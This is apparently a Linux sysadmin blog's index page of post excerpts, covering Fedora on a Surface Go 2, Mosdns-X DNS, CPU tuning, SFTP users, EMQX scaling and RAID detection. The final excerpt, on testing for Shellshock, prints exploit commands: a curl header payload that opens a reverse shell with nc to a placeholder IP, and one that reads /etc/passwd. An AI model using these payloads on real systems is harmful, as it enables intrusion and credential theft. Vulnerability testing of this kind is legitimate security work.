Hero Image
How to Install Fedora Linux on Surface Go 2 to Boost Entry-Level Tablet Performance

How to Install Fedora Linux on Surface Go 2 to Boost Entry-Level Tablet Performance Surface Go 2 (Intel Pentium 4425Y, 4G/64G) WiFi edition For Surface Go 2 hardware support, see this GitHub table: Supported Devices and Features Create a Linux boot drive Download the ISO from the Fedora KDE official site. Use Ventoy to create a boot drive. Surface Go 2 only has Type-C ports, so you may need a hub. It cannot boot from an SD card. Install Linux Shut down the Surface Go 2. Hold the power button and volume up to enter UEFI. The interface is touch-capable, but you may still need a physical keyboard for installation. Fedora supports Secure Boot, but it is recommended to disable it to avoid manual signing when installing drivers. Set the boot order to the USB drive. Boot and follow the installer. Choose to wipe the disk and install Fedora. For Chinese input, install Fcitx5: sudo dnf install fcitx5 fcitx5-chewing fcitx5-gtk3 fcitx5-gtk4 fcitx5-qt fcitx5-qt6 fcitx5-configtool Tip: Fedora enables zRAM by default. If the Surface Go has limited RAM, edit /etc/systemd/zram-generator.conf to increase SWAP size (MB). [zram0] zram-size = 8192 Install the linux-surface kernel Follow the GitHub instructions. On Fedora, add the linux-surface repo to the system: sudo dnf config-manager addrepo --from-repofile=https://pkg.surfacelinux.com/fedora/linux-surface.repo Install the linux-surface kernel and reboot: sudo dnf install --allowerasing kernel-surface iptsd libwacom-surface Use uname -a to verify the kernel is switched; it should show linux-surface. Fedora updates kernels frequently, so new kernels may override the linux-surface kernel. After installing the linux-surface packages, the linux-surface-default-watchdog.path service is enabled automatically to ensure linux-surface is used on boot. Using the virtual keyboard on KDE Enable it in System Settings → Keyboard → Virtual Keyboard. Note that this keyboard cannot be used with Fcitx5.

Thursday, December 11, 2025 Read
Hero Image
Mosdns-X

Mosdns-X Make DNS faster and cleaner on Linux: Deploy Mosdns-X install bash <(curl -sL https://raw.githubusercontent.com/lidebyte/bashshell/refs/heads/main/mosdns-x-manager.sh) config sudo tee /etc/mosdns-x/config.yaml > /dev/null <<'EOF' # mosdns-x concurrent query (no split routing) config log: level: info file: /var/log/mosdns-x/mosdns-x.log plugins: # Cache plugin - tag: cache type: cache args: size: 1024 lazy_cache_ttl: 1800 # Concurrent upstreams: take the first usable answer - tag: forward_all type: fast_forward args: upstream: # AliDNS - addr: "udp://223.5.5.5" - addr: "tls://dns.alidns.com" # DNSPod / doh.pub - addr: "udp://119.29.29.29" - addr: "tls://dot.pub" # Cloudflare - addr: "udp://1.1.1.1" - addr: "tls://cloudflare-dns.com" # Google - addr: "udp://8.8.8.8" - addr: "tls://dns.google" # Main pipeline: small cache -> concurrent selection - tag: main type: sequence args: exec: - cache - forward_all # Listen on dual-stack UDP/TCP 53 servers: - exec: main listeners: - addr: :53 protocol: udp - addr: :53 protocol: tcp EOF systemd sudo tee /etc/systemd/system/mosdns.service > /dev/null <<'EOF' [Unit] Description=Mosdns-X DNS Accelerator After=network.target [Service] Type=simple User=root Group=root ExecStart=/usr/local/bin/mosdns-x start --as-service -d /usr/local/bin -c /etc/mosdns-x/config.yaml Restart=always RestartSec=5 StandardOutput=journal StandardError=journal SyslogIdentifier=mosdns [Install] WantedBy=multi-user.target EOF sudo systemctl daemon-reload sudo systemctl enable --now mosdns # Backup system DNS sudo cp -n /etc/resolv.conf /etc/resolv.conf.mosdns-backup # Switch to local Mosdns-X echo -e "nameserver 127.0.0.1\noptions edns0" | sudo tee /etc/resolv.conf # If port 53 is occupied by systemd-resolved, disable it sudo systemctl disable --now systemd-resolved 2>/dev/null || true # If you also want to lock it (prevent DHCP changes), run chattr too: echo -e "nameserver 127.0.0.1\n" > /etc/resolv.conf && chattr +i /etc/resolv.conf # Check process status sudo systemctl status mosdns --no-pager # Test resolution speed (second run should hit cache) dig +stats www.google.com dig +stats www.baidu.com # View logs in real time tail -f /var/log/mosdns-x/mosdns-x.log

Sunday, November 9, 2025 Read
Hero Image
Docker Containers Can't Access the Internet? NAT Configuration Guide for nftables

Docker Containers Can’t Access the Internet? NAT Configuration Guide for nftables

Wednesday, September 3, 2025 Read
Hero Image
Dedicated Server CPU Frequency Maximization Guide

Dedicated Server CPU Frequency Maximization Guide Check which CPU mode is in use Prerequisites System: Linux (Debian, Ubuntu, Proxmox, etc.) Privileges: root CPU: supports dynamic frequency scaling (Intel Xeon, AMD EPYC / Ryzen, etc.) governor cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor powersave: low-power mode (locked low frequency, power-saving but weak) ondemand: on-demand boost (only boosts when needed, may respond a bit slowly) performance: full performance (this is what we want) Check which driver the kernel uses (Intel / AMD) cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_driver

Tuesday, September 2, 2025 Read
Hero Image
Use LinuxServer.io Docker Images to Turn Desktop Apps into Web Apps

Use LinuxServer.io Docker Images to Turn Desktop Apps into Web Apps LinuxServer.io Official Site

Friday, August 1, 2025 Read
Hero Image
Lightweight Linux Distributions For Older PCs

lightweight-linux-distributions-for-your-pc Name Site Comment Puppy Linux https://puppylinux-woof-ce.github.io/ This tiny OS weighs in at under 300MB, so it can run smoothly even on systems with as little as 512MB of RAM. Bodhi Linux https://www.bodhilinux.com/ System requirements are just 512MB of RAM and a 500MHz processor. Peppermint OS https://peppermintos.com/ It only needs 512MB of RAM to run, so it will fly on that Pentium 4 machine or Core 2 Duo laptop you have stashed in your closet. While Peppermint OS is light on local resources, it integrates well with cloud and web apps. The OS builds in close integration with services like Dropbox, Google Drive, and more. AntiX https://antixlinux.com/ AntiX is designed to run on systems with as little as 64MB of RAM and a Pentium II processor. Lubuntu https://lubuntu.me/ Lubuntu will run smoothly on computers with as little as 512 MB of RAM and a 1 GHz processor.

Tuesday, August 20, 2024 Read
Hero Image
Add SFTP user and share directory

Add SFTP user and share directory dev_test_user, qa_test_user 同權限 dev_user, qa_user 同權限 1. 建立共享資料夾(SFTP 使用的資料夾) sudo mkdir -p /home/{test,prod}/{exchange,upload} sudo mkdir -p /home/{test,prod}/exchange/success sudo mkdir -p /home/{test,prod}/upload/backup 2. 建立使用者群組 sudo groupadd share01-test sudo groupadd share01-prod 3. 創建 qa_test_user 使用者並設定 qa_test_user 使用者的群組為 share01-test sudo useradd -m -G share01-test qa_test_user # 設定 dev_test_user 使用者的群組為 share01-test sudo usermod -G share01-test dev_test_user # 設定密碼 sudo passwd qa_test_user 4. 創建 qa_user 使用者並設定 qa_user 使用者的群組為 share01-prod sudo useradd -m -G share01-prod qa_user # 設定 dev_user 使用者的群組為 share01-prod sudo usermod -G share01-prod dev_user # 設定密碼 sudo passwd qa_user 5. 設定權限 # 設定 /home/test 資料夾(含下級資料夾)的使用者為 qa_test_user,群組為 share01-test sudo chown -R qa_test_user:share01-test test/ # 設定 /home/prod 資料夾(含下級資料夾)的使用者為 qa_user,群組為 share01-prod sudo chown -R qa_user:share01-prod prod/ # SFTP 登入資料夾權限要給 root sudo chown root:root /home/test sudo chown root:root /home/prod 6. 設定 /etc/ssh/sshd_config /etc/ssh/sshd_config

Thursday, November 30, 2023 Read
Hero Image
Container security fundamentals

Container security fundamentals: Exploring containers as processes Container security fundamentals part 2: Isolation & namespaces Container security fundamentals part 3: Capabilities Container security fundamentals part 4: Cgroups Container security fundamentals part 5: AppArmor and SELinux Container security fundamentals part 6: seccomp

Wednesday, October 4, 2023 Read
Hero Image
Tuning EMQX to Scale to One Million Concurrent Connection on Kubernetes

Tuning EMQX to Scale to One Million Concurrent Connection on Kubernetes Performance Tuning (Linux) 矽谷牛的耕田筆記 Linux Kernel Tuning node level, basically the non-namespaced sysctls # Sets the maximum number of file handles allowed by the kernel sysctl -w fs.file-max=2097152 # Sets the maximum number of open file descriptors that a process can have sysctl -w fs.nr_open=2097152 namespaced sysctls # Sets the maximum number of connections that can be queued for acceptance by the kernel. sysctl -w net.core.somaxconn=32768 # Sets the maximum number of SYN requests that can be queued by the kernel sysctl -w net.ipv4.tcp_max_syn_backlog=16384 # Setting the minimum, default and maximum size of TCP Buffer sysctl -w net.ipv4.tcp_rmem='1024 4096 16777216' sysctl -w net.ipv4.tcp_wmem='1024 4096 16777216' # Setting Parameters for TCP Connection Tracking sysctl -w net.netfilter.nf_conntrack_tcp_timeout_time_wait=30 # Controls the maximum number of entries in the TCP time-wait bucket table sysctl -w net.ipv4.tcp_max_tw_buckets=1048576 # Controls Timeout for FIN-WAIT-2 Sockets: sysctl -w net.ipv4.tcp_fin_timeout=15 There are some more namespaced sysctls that will improve the performance but because of an active issue we are not able to set them on the container level # Sets the size of the backlog queue for the network device sysctl -w net.core.netdev_max_backlog=16384 # Amount of memory that is allocated for storing incoming and outgoing data for a socket sysctl -w net.core.rmem_default=262144 sysctl -w net.core.wmem_default=262144 # Setting the maximum amount of memory for the socket buffers sysctl -w net.core.rmem_max=16777216 sysctl -w net.core.wmem_max=16777216 sysctl -w net.core.optmem_max=16777216 Erlang VM Tuning ## Erlang Process Limit node.process_limit = 2097152 ## Sets the maximum number of simultaneously existing ports for this system node.max_ports = 2097152 EMQX Broker Tuning # Other configuration… EMQX_LISTENER__TCP__EXTERNAL: "0.0.0.0:1883" EMQX_LISTENER__TCP__EXTERNAL__ACCEPTORS: 64 EMQX_LISTENER__TCP__EXTERNAL__MAX_CONNECTIONS: 1024000

Wednesday, September 27, 2023 Read
Hero Image
Everything About MTU and MSS

Everything About MTU and MSS

Wednesday, April 12, 2023 Read
Hero Image
How to Detect RAID Information in Linux

How to Detect RAID Information in Linux lspci lspci | grep RAID 00:1f.2 RAID bus controller: Intel Corporation 82801 Mobile SATA Controller [RAID mode] (rev 04) lshw lshw -class storage *-raid description: RAID bus controller product: 82801 Mobile SATA Controller [RAID mode] vendor: Intel Corporation physical id: 1f.2 bus info: pci@0000:00:1f.2 logical name: scsi0 version: 04 width: 32 bits clock: 66MHz capabilities: raid msi pm bus_master cap_list emulated configuration: driver=ahci latency=0 resources: irq:26 ioport:f0d0(size=8) ioport:f0c0(size=4) ioport:f0b0(size=8) ioport:f0a0(size=4) ioport:f060(size=32) memory:f7e36000-f7e367ff smartctl dmesg | grep -i scsi [ 0.210852] SCSI subsystem initialized [ 0.341280] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 243) ... [ 1.213299] scsi 0:0:0:0: Direct-Access ATA ST320LT012-9WS14 YAM1 PQ: 0 ANSI: 5 [ 1.319886] sd 0:0:0:0: [sda] Attached SCSI disk [ 19.571008] sd 0:0:0:0: Attached scsi generic sg0 type 0 smartctl --all /dev/sda Model Family: Seagate Laptop HDD Device Model: ST320LT012-9WS14C Serial Number: S0V3R9LL LU WWN Device Id: 5 000c50 05be4653c Firmware Version: 0001YAM1 User Capacity: 320,072,933,376 bytes [320 GB] Sector Sizes: 512 bytes logical, 4096 bytes physical Rotation Rate: 5400 rpm Form Factor: 2.5 inches Device is: In smartctl database 7.3/5319 ATA Version is: ATA8-ACS T13/1699-D revision 4 SATA Version is: SATA 2.6, 3.0 Gb/s (current: 3.0 Gb/s) Local Time is: Sat Nov 19 20:52:01 2022 PKT SMART support is: Available - device has SMART capability. SMART support is: Enabled ... MegaCLI megacli -LDInfo -Lall -aALL Adapter 0 -- Virtual Drive Information: Virtual Drive: 0 (Target Id: 0) Name : SEAGATE RAID Level : Primary-1, Secondary-0, RAID Level Qualifier-0 Size : 320 GB Sector Size : 512 Mirror Data : 320 GB State : Optimal ... lsscsi lsscsi [0:0:0:0] disk ATA ST320LT012-9WS14 YAM1 /dev/sda Vendor-Specific Tools omreport storage vdisk List of Virtual Disks in the System Controller SEAGATE Laptop HDD ID : 0 Status : Ok Name : SEAGATE State : Ready Hot Spare Policy violated : Not Assigned Encrypted : No Layout : RAID-0 Size : 320.00 GB (343597383680 bytes) T10 Protection Information Status : No Associated Fluid Cache State : Not Applicable Device Name : /dev/sda Bus Protocol : ATA Media : HDD Read Policy : Adaptive Read Ahead Write Policy : Write Back Cache Policy : Not Applicable Stripe Element Size : 128 KB Disk Cache Policy : Enabled

Monday, November 28, 2022 Read
Hero Image
Test Whether a Server Is Vulnerable to Shellshock Bug

Test Whether a Server Is Vulnerable to Shellshock Bug The Shellshock Bug env x=' () {:;};' Exploiting Shellshock Bug A substituted command is executed since the feature ignores the command specified by the user, and instead, it runs that which the ForceCommand defines. The ignored commands from the user are put in the “SSH_ORIGINAL_COMMAND” environment variable. If the user’s default shell is Bash, the Bash shell will parse the value of the “SSH_ORIGINAL_COMMAND” environment variable on start-up and run the embedded commands. Examples of Shellshock Exploit Commands ## 1 curl -H "X-Frame-Options: () {:;};echo;/bin/nc -e /bin/bash 192.168.y.y 443" 192.168.x.y/CGI-bin/hello.cgi ## 2 curl --insecure 192.168.x.x -H "User-Agent: () { :; }; /bin/cat /etc/passwd" use nmap script to test for the vulnerability nmap -sV -p- --script http-shellshock 192.168.x.x nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x

Monday, November 28, 2022 Read